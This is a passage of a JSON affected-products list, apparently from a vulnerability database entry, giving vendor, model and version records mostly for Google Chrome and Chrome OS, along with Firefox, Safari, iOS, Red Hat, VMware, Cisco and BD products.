        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.28"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.571.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.23"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.30"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.79"
      },
      {
        "_id": null,
        "model": "windows version for 32-bit systems",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "microsoft",
        "version": "1016070"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1677.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.19"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.76"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.82"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.911.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.734.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.15"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.954.1"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.418.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.667.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.38"
      },
      {
        "_id": null,
        "model": "ios",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "8.1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.14"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1310.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "21.0.1180.34"
      },
      {
        "_id": null,
        "model": "pyxis transfusion verification",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "0.9.131.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.342"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.512"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.93"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.53"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.35"
      },
      {
        "_id": null,
        "model": "vrealize automation",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "6.2.4.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.485.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.48"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.678.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.16"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "7.1.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.372.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.27"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.91"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "35.0.1916.77"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.949.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "23.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.638.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "54.0.2840.99"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.450.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.392.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "32"
      },
      {
        "_id": null,
        "model": "enterprise linux server extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-7.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "34.0.1847.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.212"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1063"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.710.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.206"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.289.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "22.0.1229.56"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.49"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "7.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "52"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.11"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.620.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.96"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "32.0.1685.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.472.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.55"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.568.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.735.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "50.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.487.0"
      },
      {
        "_id": null,
        "model": "workstation",
        "scope": "ne",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "12.5.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.302.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.129"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.124"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.9"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.590.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.113"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "6.0.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.827.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.23"
      },
      {
        "_id": null,
        "model": "carrier routing system 6.6.0.base",
        "scope": null,
        "trust": 0.3,
        "vendor": "cisco",
        "version": null
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.89"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.332.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "28.0.1500.49"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.107"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.953.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.666.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1071.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1013.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.41"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.83"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.73"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.113"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.5.12"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.0.275.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.340.0"
      },
      {
        "_id": null,
        "model": "facsaria fusion",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "bd",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.373.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.87"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "20.0.1132.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "49.0.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.32"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.30"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.0"
      },
      {
        "_id": null,
        "model": "vsphere integrated containers",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "vmware",
        "version": "1.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1036.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.50"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.353.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.408.2"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "3.0.19"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "61.0.3163.79"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.43"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.84"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "2.0.16"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.26"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "11.0.696.5"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "15.0.874.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.47"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.51"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.470.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.461.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "22.04917"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1285.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.446.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.88"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.5"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "1.5.0.1"
      },
      {
        "_id": null,
        "model": "enterprise linux for power big endian extended update support",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "redhat",
        "version": "-6.7"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.357.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.459.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.541.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.221"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.65"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.64"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.18"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.31"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.333.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.779.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.90"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "31.0.1650.6"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "30.0.1599.57"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "1.0.154.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "7.0.517.17"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "24.0.1312.9"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.4"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "8.0.552.307"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "12.0.742.121"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.127"
      },
      {
        "_id": null,
        "model": "chrome beta mac",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.342.7"
      },
      {
        "_id": null,
        "model": "macos",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.20"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1027"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.396.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "46"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "27.0.1453.13"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.110"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.10"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.101"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.428.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.35"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "5.0.375.42"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "17.0.963.29"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.612.2"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.95"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "37.0.2062.92"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1035.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "23.0.1"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.21"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "6.1.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.767.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.891.1"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.460.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "14.0.835.14"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "10.0.9"
      },
      {
        "_id": null,
        "model": "safari",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "apple",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1001.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "10.0.648.87"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "34.0.5"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "16.0.912.2"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.18"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "25.0.1364.75"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "5.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.466.3"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "4.1.249.1053"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1025.74"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "19.0.1084.25"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "9.0.597.8"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "6.0.455.0"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "23.0.1271.45"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "18.0.1014.0"
      },
      {
        "_id": null,
        "model": "firefox",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "mozilla",
        "version": "21.0"
      },
      {
        "_id": null,
        "model": "chrome os",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "26.0.1410.44"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.220"
      },
      {
        "_id": null,
        "model": "chrome",
        "scope": "eq",
        "trust": 0.3,
        "vendor": "google",
        "version": "13.0.782.210"
      },
